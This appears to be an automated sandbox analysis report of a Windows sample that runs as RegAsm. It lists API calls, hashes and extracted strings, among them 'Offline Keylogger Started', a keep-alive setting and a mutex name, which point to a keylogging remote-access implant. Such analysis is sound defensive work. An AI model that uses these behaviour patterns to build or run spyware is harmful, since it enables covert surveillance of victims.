                                                                                                                          control_flow_graph 1710 44acc9-44ace2 1711 44ace4-44acf4 call 4467e6 1710->1711 1712 44acf8-44acfd 1710->1712 1711->1712 1719 44acf6 1711->1719 1714 44acff-44ad07 1712->1714 1715 44ad0a-44ad2e MultiByteToWideChar 1712->1715 1714->1715 1717 44ad34-44ad40 1715->1717 1718 44aec1-44aed4 call 43502b 1715->1718 1720 44ad94 1717->1720 1721 44ad42-44ad53 1717->1721 1719->1712 1723 44ad96-44ad98 1720->1723 1724 44ad55-44ad64 call 457210 1721->1724 1725 44ad72-44ad83 call 4461b8 1721->1725 1727 44aeb6 1723->1727 1728 44ad9e-44adb1 MultiByteToWideChar 1723->1728 1724->1727 1738 44ad6a-44ad70 1724->1738 1725->1727 1735 44ad89 1725->1735 1732 44aeb8-44aebf call 435ecd 1727->1732 1728->1727 1731 44adb7-44adc9 call 448c33 1728->1731 1740 44adce-44add2 1731->1740 1732->1718 1739 44ad8f-44ad92 1735->1739 1738->1739 1739->1723 1740->1727 1742 44add8-44addf 1740->1742 1743 44ade1-44ade6 1742->1743 1744 44ae19-44ae25 1742->1744 1743->1732 1747 44adec-44adee 1743->1747 1745 44ae27-44ae38 1744->1745 1746 44ae71 1744->1746 1748 44ae53-44ae64 call 4461b8 1745->1748 1749 44ae3a-44ae49 call 457210 1745->1749 1750 44ae73-44ae75 1746->1750 1747->1727 1751 44adf4-44ae0e call 448c33 1747->1751 1755 44aeaf-44aeb5 call 435ecd 1748->1755 1764 44ae66 1748->1764 1749->1755 1762 44ae4b-44ae51 1749->1762 1754 44ae77-44ae90 call 448c33 1750->1754 1750->1755 1751->1732 1766 44ae14 1751->1766 1754->1755 1768 44ae92-44ae99 1754->1768 1755->1727 1767 44ae6c-44ae6f 1762->1767 1764->1767 1766->1727 1767->1750 1769 44aed5-44aedb 1768->1769 1770 44ae9b-44ae9c 1768->1770 1771 44ae9d-44aead WideCharToMultiByte 1769->1771 1770->1771 1771->1755 1772 44aedd-44aee4 call 435ecd 1771->1772 1772->1732
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                          • __freea.LIBCMT ref: 0044AEB0
                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                          • __freea.LIBCMT ref: 0044AEB9
                                                                                                                          • __freea.LIBCMT ref: 0044AEDE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3864826663-0
                                                                                                                          • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                          • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                          • String ID: xpF
                                                                                                                          • API String ID: 1852769593-354647465
                                                                                                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                          • __freea.LIBCMT ref: 10008A08
                                                                                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                          • __freea.LIBCMT ref: 10008A11
                                                                                                                          • __freea.LIBCMT ref: 10008A36
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1414292761-0
                                                                                                                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                          • String ID: XQG
                                                                                                                          • API String ID: 1958988193-3606453820
                                                                                                                          • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                          • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                          • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                          • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CountEventTick
                                                                                                                          • String ID: !D@$NG
                                                                                                                          • API String ID: 180926312-2721294649
                                                                                                                          • Opcode ID: 4713c36fcbac08608a4361280b7e24833d1112ad43d0243e40292e8207760e54
                                                                                                                          • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                          • Opcode Fuzzy Hash: 4713c36fcbac08608a4361280b7e24833d1112ad43d0243e40292e8207760e54
                                                                                                                          • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                                                          • String ID: Offline Keylogger Started
                                                                                                                          • API String ID: 465354869-4114347211
                                                                                                                          • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                          • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                          APIs
                                                                                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                          Strings
                                                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                          • API String ID: 2532271599-1507639952
                                                                                                                          • Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                                                          • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                          • Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                                                          • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValue
                                                                                                                          • String ID: pth_unenc
                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3360349984-0
                                                                                                                          • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                          • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModuleProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2905821283-0
                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3177248105-0
                                                                                                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3177248105-0
                                                                                                                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3919263394-0
                                                                                                                          • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                          • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                          APIs
                                                                                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,02x,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                          • String ID: 02x
                                                                                                                          • API String ID: 1170566393-1753518589
                                                                                                                          • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                          • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                                                                          • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                          • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                                                                          APIs
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                          • String ID: Rmc-EPF38I
                                                                                                                          • API String ID: 1925916568-3825396231
                                                                                                                          • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                          • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                                                          • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                          • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
